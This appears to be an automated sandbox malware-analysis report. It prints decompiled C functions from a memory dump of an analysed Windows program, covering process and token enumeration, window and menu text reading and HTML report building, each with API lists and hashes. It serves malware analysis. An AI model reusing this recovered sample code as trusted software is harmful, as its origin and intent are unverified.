                                                                                                                                                                                                                          					_t49 = _t48 + _v8 + 1;
                                                                                                                                                                                                                          					_t41 = wcslen( *_t52);
                                                                                                                                                                                                                          					_v8 = _t41;
                                                                                                                                                                                                                          					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                                                                                                                          					_t54 = _t54 + 0x34;
                                                                                                                                                                                                                          					_t52 =  &(_t52[2]);
                                                                                                                                                                                                                          					_t23 =  &_v12;
                                                                                                                                                                                                                          					 *_t23 = _v12 - 1;
                                                                                                                                                                                                                          					_t48 = _t49 + _v8 + 1;
                                                                                                                                                                                                                          				} while ( *_t23 != 0);
                                                                                                                                                                                                                          				_t50 = __ebx + _t48 * 2;
                                                                                                                                                                                                                          				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                                                                                                                          				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                                                                                                                          				return __ebx;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                          • API String ID: 3979103747-1363028141
                                                                                                                                                                                                                          • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                          			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				short _v516;
                                                                                                                                                                                                                          				void _v8710;
                                                                                                                                                                                                                          				short _v8712;
                                                                                                                                                                                                                          				int _t17;
                                                                                                                                                                                                                          				WCHAR* _t26;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2204, __ecx);
                                                                                                                                                                                                                          				_v8712 = 0;
                                                                                                                                                                                                                          				memset( &_v8710, 0, 0x2000);
                                                                                                                                                                                                                          				_t17 = GetDlgCtrlID(_a4);
                                                                                                                                                                                                                          				_t34 = _t17;
                                                                                                                                                                                                                          				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                                                                                                                          				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                                                                          					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                                                                                          					_t26 =  &_v516;
                                                                                                                                                                                                                          					_push(L"sysdatetimepick32");
                                                                                                                                                                                                                          					_push(_t26);
                                                                                                                                                                                                                          					L0040B278();
                                                                                                                                                                                                                          					if(_t26 != 0) {
                                                                                                                                                                                                                          						E00406025(_t34,  &_v8712);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                          • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                                                                                                                          				short _v8;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                          				long _t14;
                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				_t8 = 0;
                                                                                                                                                                                                                          				_t14 = 0x1100;
                                                                                                                                                                                                                          				if(__edi - 0x834 <= 0x383) {
                                                                                                                                                                                                                          					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                          						_t14 = 0x1900;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                                                                                                                          					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if(wcslen(_v8) < 0x400) {
                                                                                                                                                                                                                          						wcscpy(_a4, _v8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t10 = LocalFree(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00404756
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404766
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404780
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                          • String ID: netmsg.dll
                                                                                                                                                                                                                          • API String ID: 2767993716-3706735626
                                                                                                                                                                                                                          • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                          				void _v582;
                                                                                                                                                                                                                          				long _v584;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                          				wchar_t* _t34;
                                                                                                                                                                                                                          				wchar_t* _t42;
                                                                                                                                                                                                                          				long* _t43;
                                                                                                                                                                                                                          				int _t44;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                          				long _t56;
                                                                                                                                                                                                                          				long* _t57;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t60 = __eflags;
                                                                                                                                                                                                                          				_t52 = __edx;
                                                                                                                                                                                                                          				E004095AB( &_v72);
                                                                                                                                                                                                                          				_v584 = 0;
                                                                                                                                                                                                                          				memset( &_v582, 0, 0x1fe);
                                                                                                                                                                                                                          				E004095FD(_t52, _t60,  &_v72);
                                                                                                                                                                                                                          				_t27 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				if(_v20 <= 0) {
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					_t56 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                                                                                                                          						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t34 =  &_v584;
                                                                                                                                                                                                                          							_push(_t34);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							L0040B278();
                                                                                                                                                                                                                          							if(_t34 == 0) {
                                                                                                                                                                                                                          								L5:
                                                                                                                                                                                                                          								_t44 = 0;
                                                                                                                                                                                                                          								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                                                                                                                          								if(_t54 == 0) {
                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_v16 = _v16 & 0;
                                                                                                                                                                                                                          									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                                                                                                                          										_t44 = 1;
                                                                                                                                                                                                                          										CloseHandle(_v16);
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									CloseHandle(_t54);
                                                                                                                                                                                                                          									if(_t44 != 0) {
                                                                                                                                                                                                                          										_t56 =  *_t57;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L9;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                                                                                                                          								if(_t42 == 0) {
                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t43 =  &(_t42[0]);
                                                                                                                                                                                                                          									_push(_t43);
                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                          									L0040B278();
                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                          										goto L9;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                          						_t27 = _v12 + 1;
                                                                                                                                                                                                                          						_v12 = _t27;
                                                                                                                                                                                                                          					} while (_t27 < _v20);
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L12:
                                                                                                                                                                                                                          				E004095DA( &_v72);
                                                                                                                                                                                                                          				return _t56;
                                                                                                                                                                                                                          			}


                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                            • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                            • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                            • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                            • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                            • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 768606695-0
                                                                                                                                                                                                                          • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                          				void _v68;
                                                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                                                          				void _v160;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                          				wchar_t* _t67;
                                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                          				signed int _t95;
                                                                                                                                                                                                                          				intOrPtr* _t98;
                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t73 = __ebx;
                                                                                                                                                                                                                          				_t74 = 0xd;
                                                                                                                                                                                                                          				_push(9);
                                                                                                                                                                                                                          				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                                                                                                                          				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                                                                                                                          				_t102 = _t100 + 0x18;
                                                                                                                                                                                                                          				asm("movsw");
                                                                                                                                                                                                                          				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                                                                                                                          				_t95 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                                                                                                                          						_v8 = _t55;
                                                                                                                                                                                                                          						_t57 =  &_v160;
                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                                                                                                                          							_t57 =  &_v68;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t98 = _a8;
                                                                                                                                                                                                                          						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                                                                          						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                                                                          						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                                                                          						_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                          						_v12 = _t57;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                                                                                                                          						E0040ADC0(_v28,  &_v108);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                                                                                                                          						_t67 =  *(_t73 + 0x64);
                                                                                                                                                                                                                          						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                                                                                                                          						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                                                                                                                          							wcscat(_t67, L"&nbsp;");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                                                                                          						_push( &_v108);
                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t102 = _t102 + 0x1c;
                                                                                                                                                                                                                          						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                                                                                                                          						_t95 = _t95 + 1;
                                                                                                                                                                                                                          					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                                                                                                                          			}


                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                          • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                                                                                                                          				struct tagMENUITEMINFOW _v0;
                                                                                                                                                                                                                          				int _t24;
                                                                                                                                                                                                                          				wchar_t* _t30;
                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t36 = __ecx;
                                                                                                                                                                                                                          				_t48 = _t47 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x203c, __ecx);
                                                                                                                                                                                                                          				_t24 = GetMenuItemCount(_a8);
                                                                                                                                                                                                                          				_t34 = _t24;
                                                                                                                                                                                                                          				_t42 = 0;
                                                                                                                                                                                                                          				if(_t34 <= 0) {
                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					goto L1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                          					memset( &_a50, 0, 0x2000);
                                                                                                                                                                                                                          					_t48 = _t48 + 0xc;
                                                                                                                                                                                                                          					_a36 =  &_a48;
                                                                                                                                                                                                                          					_v0.cbSize = 0x30;
                                                                                                                                                                                                                          					_a4 = 0x36;
                                                                                                                                                                                                                          					_a40 = 0x1000;
                                                                                                                                                                                                                          					_a16 = 0;
                                                                                                                                                                                                                          					_a48 = 0;
                                                                                                                                                                                                                          					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                                                                                                                          					if(_t24 == 0) {
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_a48 == 0) {
                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                          						_t56 = _a20;
                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                          							_push(_a20);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							_t24 = E0040605E(_t36, _t56);
                                                                                                                                                                                                                          							_t48 = _t48 + 0xc;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t30 = wcschr( &_a48, 9);
                                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                                          						 *_t30 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t31 = _a16;
                                                                                                                                                                                                                          					if(_a20 != 0) {
                                                                                                                                                                                                                          						if(_a12 == 0) {
                                                                                                                                                                                                                          							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                                                                                                                          							_t32 =  *0x40fe20; // 0x0
                                                                                                                                                                                                                          							_t31 = _t32 + 0x11558;
                                                                                                                                                                                                                          							__eflags = _t32 + 0x11558;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                                                                                                                          							_t31 = _t17;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t24 = E00406025(_t31,  &_a48);
                                                                                                                                                                                                                          					_pop(_t36);
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                          					_t42 = _t42 + 1;
                                                                                                                                                                                                                          				} while (_t42 < _t34);
                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                          • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E00402BEE(void* __ebx) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t34 = __ebx;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                                                                                                                          					return _t27;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
